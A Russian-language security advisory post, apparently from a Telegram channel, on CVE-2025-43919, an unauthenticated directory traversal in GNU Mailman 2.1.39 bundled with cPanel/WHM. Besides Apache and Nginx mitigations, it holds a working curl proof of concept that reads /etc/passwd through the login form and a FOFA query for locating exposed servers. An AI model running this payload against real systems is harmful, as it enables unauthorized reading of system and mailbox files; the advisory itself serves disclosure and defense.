
Обнаружена новая уязвимость в GNU Mailman 2.1.39, поставляемом вместе с cPanel/WHM, позволяющая неаутентифицированным удалённым злоумышленникам читать произвольные файлы на сервере через дефект обхода каталогов.
В GNU Mailman 2.1.39, поставляемом с cPanel/WHM, обнаружена новая уязвимость, позволяющая неавторизованным удалённым злоумышленникам читать произвольные файлы на сервере через обход каталога.
📌 Сводка по уязвимости:
Directory Traversal (без аутентификации)private.py/mailman/private/mailman/etc/passwd, .mbox archives и Mailman configs5.8 (Medium)CVE-2025-43919Статус: официального исправления нет (Mailman 2.1.x — EOL)
🔥 PoC:
curl -X POST -d "username=../../../../etc/passwd&password=x&submit=Let+me+in..." \
http://target/mailman/private/mailman
🧨 Сценарии эксплуатации:
/etc/passwd, configs или mailbox files🛡️ Меры по смягчению:
Заблокируйте доступ к /mailman/private на уровне веб-сервера:
<Location "/mailman/private">
Require ip 127.0.0.1
Deny from all
</Location>
Или в Nginx:
location /mailman/private {
deny all;
return 403;
}
⬆️ Переходите на Mailman 3.x — 2.x — EOL и не имеет современных средств защиты
🔍 Поисковый запрос FOFA : app="Mailman"
📚 Узнавайте больше, делитесь ответственно и держите свою инфраструктуру в безопасности.
🔒 Подписывайтесь на новые реальные CVE, PoC и советы по укреплению защиты: 👉 @cybersecplayground
#bugbounty #infosec #exploit #pentest #cve2025 #directorytraversal #linuxsecurity